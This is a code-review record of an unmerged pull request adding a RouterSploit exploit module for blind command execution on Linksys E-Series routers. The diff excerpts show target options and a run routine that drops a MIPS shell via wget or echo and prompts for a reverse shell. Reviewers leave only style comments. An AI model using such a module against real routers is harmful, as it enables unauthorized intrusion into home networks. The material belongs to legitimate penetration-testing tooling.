### PR TITLE
Linksys E-Series TM-UNBLOCK CGI Blind OS Command Execution

### PR DESCRIPTION
**Pull request by realoriginal**
Added from previous PR, module can drop a shell either via wget or echo, whichever your choice

## note
will be happy to provide a PCAP if need be.

### CODE REVIEW

**Comment by realoriginal** [comment]
and...yeah..i know what to fix

**Comment by lucyoa** [comment]
Yea it would be cool if you could send PCAP file to marcin.bury[at]reverse-shell.com

**Comment by realoriginal** [comment]
Ok. will get it to you in the morning.

**Comment by lucyoa** [comment]
ping @realoriginal

**Comment by realoriginal** [comment]
fuck forgot. Emailing in about an hour @lucyoa

**Comment by realoriginal** [comment]
sent in @lucyoa from my estranged email

File: routersploit/modules/exploits/routers/linksys/multi_tmunblock_cgi_exec.py [hunk 1]
```diff
@@ -0,0 +1,81 @@
...
+   'Linksys E2000',
+   'Linksys E1550',
+   'Linksys E1200',
+   'Linksys E1000',
+   'Linksys E900',
+  ],
+ }
+ target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
+ port = exploits.Option(80, 'Target port', validators=validators.integer) #default port
+ method = exploits.Option('wget', 'Method to deliver binary, either wget or echo') # default wget, easiest
```
Comment (fwkz) [inline routersploit/modules/exploits/routers/linksys/multi_tmunblock_cgi_exec.py]: This is perfect fit for `validators.choice`

File: routersploit/modules/exploits/routers/linksys/multi_tmunblock_cgi_exec.py [hunk 2]
```diff
@@ -0,0 +1,81 @@
...
+
+ def run(self):
+    if self.check():
+        print_success("Target appears to be vulnerable")
+        print_status("This is a blind command execution, so no output will be recieved. Type reverse_tcp <reverse ip> <port> to initiate reverse shell")
+        if self.method == 'wget':
+            shell(self, architecture="mipsle", method="wget", location="/tmp")
+        elif self.method == 'echo':
+            shell(self, architecture="mipsle", method="echo", location="/tmp")
```
Comment (fwkz) [inline routersploit/modules/exploits/routers/linksys/multi_tmunblock_cgi_exec.py]: `shell(self, architecture="mipsle", method=self.method, location="/tmp")` seems sufficient

File: routersploit/modules/exploits/routers/linksys/multi_tmunblock_cgi_exec.py [hunk 3]
```diff
@@ -0,0 +1,81 @@
+#!/usr/bin/python2.7
```
Comment (fwkz) [inline routersploit/modules/exploits/routers/linksys/multi_tmunblock_cgi_exec.py]: This is not necessary.

**Pull request closed without merging**